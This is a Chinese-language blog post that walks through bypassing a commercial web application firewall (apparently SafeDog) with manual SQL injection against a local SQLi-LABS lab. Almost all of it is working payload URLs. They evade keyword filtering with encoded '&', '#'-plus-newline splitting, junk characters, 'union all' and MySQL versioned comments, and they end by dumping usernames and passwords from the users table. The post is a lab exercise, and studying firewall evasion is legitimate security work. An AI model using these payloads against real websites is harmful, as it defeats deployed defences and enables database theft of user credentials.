avatar

目录
手工注入绕过xxDog

环境基于SQLi-LABS

最新版xx狗,官网上是20年更新的。

And

Code
1
http://127.0.0.1/cs/Less-1/?id=1 and 1=1

字符出现and 1就会出现拦截,单独and不会。从and下手。把and转义

Code
1
http://127.0.0.1/cs/Less-1/?id=1 %26 1=1


Order by

%0Amysql中是换行符

%23url编码,转义过来就是#

Code
1
http://127.0.0.1/cs/Less-1/?id=1 order by

出现 order by 就会被拦截。

Code
1
http://127.0.0.1/cs/Less-1/?id=1 order%23%0Aby 3

order by中间用一个#号代替空格,接着就使他换行,这样就能绕过xx狗。


Union Select

Code
1
http://127.0.0.1/cs/Less-1/?id=1 union select 1,2,3

fuzz了很久,发现无论我怎么绕,都会被拦截,后面百度了一下sql语法,可以在union 中间加其他关键字,然后在配合换行等方法,成功绕过。

Code
1
http://127.0.0.1/cs/Less-1/?id=0 union all%23%0aselect 1,2,3

这里就是将union all 先写,然后一个 #号,在进行换行


查询database()

Code
1
http://127.0.0.1/cs/Less-1/?id=0 union all%23%0aselect 1,2,database/*!40001()*/ #

/*!40001*/ 意思是,当mysql版本大于等于4的时候,就执行注释内的代码

1 /! / 这是mysql 特里的语法,并非注释,因为里面达到条件也会执行。

2 !后面是版本号, 如果本数据库等于或大于此版本号,那么注释内的代码也会执行。

3 那么这句话的意思是 如果版本号大于或等于4,会执行 sql_no_cache, 就是不用缓存数据。 而并非说本次查询不作为下次查询的缓存。

4 在备份操作时Mysql 会自动调用此语法。


后面的查表名

正常url

Code
1
http://127.0.0.1/cs/Less-1/?id=0 union all select 1,2,group_concat(table_name)  from information_schema.tables where table_schema= 'security' %23

但是在information_schema.tables时就会被拦截,所以从from处开始下手做干扰就好了

Code
1
http://127.0.0.1/cs/Less-1/?id=0 union all%23%0aselect 1,2,group_concat(table_name) %23123123%0a from information_schema.tables where table_schema= 'security' %23

这里在from前面设置了换行,%23等于#号,也就是注释,后面跟的一串数字只是垃圾字符,用来干扰狗的。


对表内数据查询

Code
1
http://127.0.0.1/cs/Less-1/?id=0 union all%23%0aselect 1,2,group_concat(column_name) %23123123%0a from information_schema.columns where table_schema = 'security' and table_name ='users' %23

查询users这个表的内容,但是按照刚开始判断, and是会被拦截的,所以这里and也要转义

Code
1
http://127.0.0.1/cs/Less-1/?id=0 union all%23%0aselect 1,2,group_concat(column_name) %23123123%0a from information_schema.columns where table_schema = 'security' %26 table_name ='users' %23


查询帐号密码

Code
1
http://127.0.0.1/cs/Less-1/?id=0 union all%23%0aselect 1,2,group_concat(concat_ws(char(32,58,32),id,username,password)) %23123123%0a from users %23

文章作者: KeyboArd
文章链接: https://www.wrpzkb.cn/bypassdog/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 KeyboArd's Blog
打赏
  • 微信
    微信
  • 支付寶
    支付寶

评论